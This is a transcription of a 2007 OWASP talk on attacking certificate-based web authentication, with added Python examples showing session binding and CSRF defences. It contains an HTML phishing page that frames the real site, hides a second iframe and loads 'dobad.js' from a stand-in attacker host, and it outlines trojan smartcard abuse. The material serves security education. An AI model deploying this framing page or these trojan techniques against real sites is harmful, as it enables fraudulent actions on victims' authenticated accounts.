The PKI Lie: Attacking Certificate Based Authentication. The OWASP Foundation. OWASP & WASC AppSec 2007 Conference

Transcription:

The PKI Lie: Attacking Certificate Based Authentication
Ofer Maor, CTO, Hacktics
OWASP & WASC AppSec 2007 Conference, San Jose, Nov 2007

Copyright 2007 - The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/
http://www.webappsec.org/
The OWASP Foundation http://www.owasp.org/

Introduction
- More and more organizations are examining PKI solutions (client certificate authentication) as an answer to modern authentication threats
- This presentation examines the common notions about PKI in web applications and presents various threats
- This lecture is:
  - NOT going to reveal any flaws in RSA or digital signature technology
  - going to show how poor implementation can allow attackers to work around it

Agenda
- Common credential theft threats
- Suggested PKI authentication solution
- Attacks on PKI implementation
  - Poor application integration
  - Trojans
  - PKI phishing
- Demo
- Conclusion
- Mitigation

Common Credential Theft Threats
- Phishing/Pharming
  - Malicious links
  - DNS hijacking
  - Trojan/Malware
  - Online phishing against OTP
- Trojans
  - HTTP monitoring
  - Key loggers
- XSS attacks
  - Session hijacking
  - XSS-based phishing

Suggested Solution: PKI & Client Certs
- PKI authentication combines:
  - Something you have (smartcard / token)
  - Something you know (PIN)
  - Some modern implementations seek to replace the PIN with biometric authentication
- Authentication requires the physical device to be plugged in (the private key is stored on the device)
- The combination of smart card, PIN, and the strength of RSA is why many consider PKI authentication hack proof.

The PKI Lie: A Hack Proof Solution
- The "hack proof" notion urges organizations to switch to PKI-based authentication at high cost
- Financial organizations
  - Many banks are deploying PKI authentication for customers
  - The solutions are considered so secure that previous phishing/pharming warnings are removed!
- Governments
  - Digital signatures are now legally valid
  - In some countries they are considerably more binding than normal signatures

The PKI (sad) Truth: PKI Authentication is not Hack Proof
- Secure in theory:
  - Very strong encryption and authentication algorithms
  - Verified robust implementation (Common Criteria)
- Fails in practice:
  - Integration of the solution with the surrounding environment may allow compromise
    - End point integration (PC/user)
    - Web application integration
  - Allows performing real-time attacks

Application Integration Flaws
- Poor authentication verification by the application
- Poor session integration
  - Relying on session information for authentication
  - No binding of the application session to the SSL session
- XSS vulnerabilities
  - Data theft
  - Execution of operations
  - Invocation of signing operations (if cached)
  - The sky is the limit
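The "no binding of the application session to the SSL session" flaw above is easiest to see next to its fix. The following is an added example, not code from the talk: a server that at login records the fingerprint of the client certificate the TLS layer authenticated, and on every later request refuses a session cookie that arrives over a connection which did not present that same certificate. The certificate bytes, user names and store classes are all constructed for illustration; a real server would take the DER bytes from the TLS layer (for example `ssl.SSLSocket.getpeercert(binary_form=True)` or a reverse-proxy header). Note what this does and does not cover: it defeats reuse of a stolen session identifier (session hijacking from the threats slide), but not the real-time frame attack described later, where the victim's own browser presents the certificate on each forged request.

```python
"""Added example: binding an application session to the TLS client certificate.

Not code from the talk. Models the flaw (session checked by id only) beside the
fix (session tied to the certificate fingerprint and re-checked per request).
The certificate bytes below are constructed placeholders, not real DER.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed stand-ins for DER-encoded client certificates.
ALICE_CERT_DER = b"-- constructed DER for alice's client cert --"
MALLORY_CERT_DER = b"-- constructed DER for a different client cert --"


def cert_fingerprint(cert_der: bytes) -> str:
    """SHA-256 fingerprint of the DER certificate presented on the TLS connection."""
    return hashlib.sha256(cert_der).hexdigest()


class UnboundSessionStore:
    """The flaw on the slide: after login only the session id is checked."""

    def __init__(self) -> None:
        self._users: Dict[str, str] = {}

    def login(self, user: str, cert_der: bytes) -> str:
        sid = secrets.token_urlsafe(32)
        self._users[sid] = user  # certificate is forgotten as soon as login succeeds
        return sid

    def authorize(self, sid: str, cert_der: Optional[bytes]) -> Optional[str]:
        return self._users.get(sid)  # cert ignored: a stolen cookie is enough


class BoundSessionStore:
    """The fix: the session is tied to the certificate and re-checked on every request."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Tuple[str, str]] = {}

    def login(self, user: str, cert_der: bytes) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, cert_fingerprint(cert_der))
        return sid

    def authorize(self, sid: str, cert_der: Optional[bytes]) -> Optional[str]:
        entry = self._sessions.get(sid)
        if entry is None or cert_der is None:
            return None  # unknown session, or cookie sent over a connection with no client cert
        user, bound_fp = entry
        if not hmac.compare_digest(bound_fp, cert_fingerprint(cert_der)):
            return None  # cookie replayed over a connection authenticated with another cert
        return user


def compare_stores() -> Dict[str, Dict[str, Optional[str]]]:
    """Run the same scenario against both stores: Alice logs in, then her cookie is
    presented over three connections (her cert, someone else's cert, no cert)."""
    results: Dict[str, Dict[str, Optional[str]]] = {}
    for name, store in (("unbound", UnboundSessionStore()), ("bound", BoundSessionStore())):
        sid = store.login("alice", ALICE_CERT_DER)
        results[name] = {
            "own_cert": store.authorize(sid, ALICE_CERT_DER),
            "other_cert": store.authorize(sid, MALLORY_CERT_DER),
            "no_cert": store.authorize(sid, None),
        }
    return results


if __name__ == "__main__":
    for store_name, outcome in compare_stores().items():
        print(store_name, outcome)
```

The unbound store accepts the cookie on all three connections; the bound store accepts it only when the same certificate is on the wire. In deployments where TLS terminates at a proxy, the fingerprint has to come from a header that only the proxy can set, or the check is trivially spoofable.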

Client Side Attacks: Trojans
- Trojans: the no. 1 pharming technique
- But also useful for direct data compromise

Client Side Attacks: Trojans
- Complete takeover of smartcard / token
- The simple way: cached PIN
- The hard way: stealing and using the PIN
  - Step #1: obtaining the PIN
    - Key loggers
    - USB sniffers (encryption might be a problem)
    - Driver manipulation
  - Step #2: utilizing the card
    - GUI-based macro (visible to the user)
    - Direct DLL access (silent mode)

Client Side Attacks: Phishing
- One of the most prominent attacks today
- Surely solved by PKI (or not?)

Real Time PKI Phishing: Overview
- Real-time phishing provides a means of overcoming the need for credential theft. Rather than being stolen, the credentials are used in real time, while the device is plugged in
- Once hijacked, the attacker can exploit the existing credentials using CSRF, reflected XSS or other means
- As is common with other CSRF/XSS attacks, the user has little, if any, way of preventing this.

Real Time PKI Phishing: Analysis
- The attack is performed by creating a fake site (much like regular phishing attacks)
- The site has no content of its own and contains 2 frames:
  - Frame I: uses the entire screen area and presents the real site
  - Frame II: invisible, and used for taking advantage of the logged-on user
- Utilizing cross-domain techniques (CSRF, JavaScript inclusion, etc.), Frame II, already authenticated, is used to launch attacks

Real Time PKI Phishing: Flow
- The user follows a link to the malicious (phishing) site
- The response is an HTML document with no content of its own, as follows:

    <HTML>
    <IFRAME WIDTH=100% HEIGHT=100% NAME=REAL FRAMEBORDER=1 SRC="http://www.myrealsite.com/"></IFRAME>
    <IFRAME WIDTH=0% HEIGHT=0% NAME=EVIL FRAMEBORDER=1></IFRAME>
    <SCRIPT SRC="http://www.myFAKEsite.com/dobad.js"></SCRIPT>
    </HTML>

Real Time PKI Phishing: Flow (Cont'd)
- The user is then presented with the certificate selection dialog
- The user experience is IDENTICAL

Real Time PKI Phishing: Flow (Cont'd)
- Once the user has logged on, the user is able to browse through the site
- The malicious site is now able to perform navigation events on the 2nd IFrame. This allows execution of any operation in the site on behalf of the user

Real Time PKI Phishing: Demo

Real Time PKI Phishing: Limitations
- Data viewing may not be possible (cross-site limitations)
- Relies on CSRF capabilities (won't work well in .NET)
- However, both limitations are easily bypassed with reflected XSS
  - The phishing site provides the persistency platform
  - XSS can then be used to access sensitive data
  - XSS can also be used to obtain whatever random data is required to overcome CSRF protection

Additional Real Time PKI Phishing Aspects
- Proprietary ActiveX-based authentication (as opposed to integrated browser certificates)
  - Identifying when the main frame has been successfully authenticated can be performed using cross-domain exploits (e.g. JS includes)
- Man-in-the-middle techniques: an alternative to CSRF/XSS attacks
  - Establish a connection with the client, and relay the challenge from the original server to the client.
  - Might generate some warnings, but users tend to ignore those

Conclusion
- Embedding PKI authentication in web applications is not a magic solution!
- Trojans, pharming, phishing, CSRF, XSS, as well as other application vulnerabilities, remain a significant concern
- These problems must be addressed well before implementing client-side certificates
- With that said, client-side certificates stored on a secure physical device are still a very strong form of authentication

Mitigation
- CSRF protection: massively discussed yesterday
- XSS protection: massively discussed for the past few years
- Trojan protection: tricky (requires taking the PC out of the equation)
  - On-device PIN input and verification
  - On-device biometric verification
  - On-device OK confirmation
  - Clean from-device OS boot (might work with virtualization as well)
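The slide names CSRF protection but, having been covered the day before, does not show it. The following is an added example, not code from the talk, of the two server-side controls that break the two-frame attack described earlier: a per-session synchronizer token that the hidden frame cannot read from another origin (so a navigation or form post it drives arrives without it), and anti-framing response headers that stop the real site from loading inside Frame I at all. The token check is the mechanism the talk refers to; the `X-Frame-Options` and `Content-Security-Policy: frame-ancestors` headers are not mentioned in the talk (both post-date it) and are added here as the modern defender's counterpart to the framing layout. The endpoint, session ids and form data are constructed for illustration. The caveat from the Limitations slide still applies: a reflected XSS on the real site lets the attacker read the token, so the token only holds up while the site is XSS-free.

```python
"""Added example: synchronizer-token CSRF check plus anti-framing headers.

Not code from the talk. Models a state-changing endpoint (a funds transfer)
reached after client-certificate login, and shows a legitimate submission
beside one driven from a hidden cross-origin frame. Session ids and form
contents are constructed.
"""
import hmac
import secrets
from typing import Dict, Optional


class CsrfProtector:
    """One unguessable token per session; state-changing requests must echo it."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def issue(self, session_id: str) -> str:
        # Embedded in the real site's own forms. A page on another origin
        # (the phishing site's hidden frame) cannot read it, so it cannot
        # include it in the requests it forges on the user's behalf.
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify(self, session_id: str, submitted: Optional[str]) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        # Constant-time compare so a wrong token is not distinguishable by timing.
        return hmac.compare_digest(expected, submitted)


def anti_framing_headers() -> Dict[str, str]:
    """Response headers that refuse to render the real site inside any frame.
    Both headers post-date the 2007 talk; added here as the framing counterpart
    to the CSRF token. Browsers that honour CSP ignore X-Frame-Options."""
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }


def handle_transfer(protector: CsrfProtector, session_id: str, form: Dict[str, str]) -> Dict:
    """Constructed model of a transfer endpoint. The session id stands for the cookie
    the browser sends automatically, which is why it alone must not authorize the action."""
    headers = anti_framing_headers()
    if not protector.verify(session_id, form.get("csrf_token")):
        return {"status": 403, "body": "CSRF token missing or invalid", "headers": headers}
    return {"status": 200, "body": f"transferred {form['amount']} to {form['to']}", "headers": headers}


def demo():
    """Legitimate submission carries the token; the frame-driven one does not."""
    protector = CsrfProtector()
    sid = "session-of-alice"  # constructed stand-in for the session cookie
    token = protector.issue(sid)
    legitimate = handle_transfer(
        protector, sid, {"to": "savings", "amount": "100", "csrf_token": token}
    )
    # Same session cookie, submitted from the hidden frame on the phishing origin,
    # which never saw the token.
    forged = handle_transfer(protector, sid, {"to": "attacker-account", "amount": "100"})
    return legitimate["status"], forged["status"]


if __name__ == "__main__":
    print(demo())
```

The token must be tied to the session (not global) and checked on every state-changing request, including ones reachable by GET; the frame attack on the earlier slides works by navigating the hidden frame, so GET-triggered actions are exactly what it reaches.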

Thank You! Questions?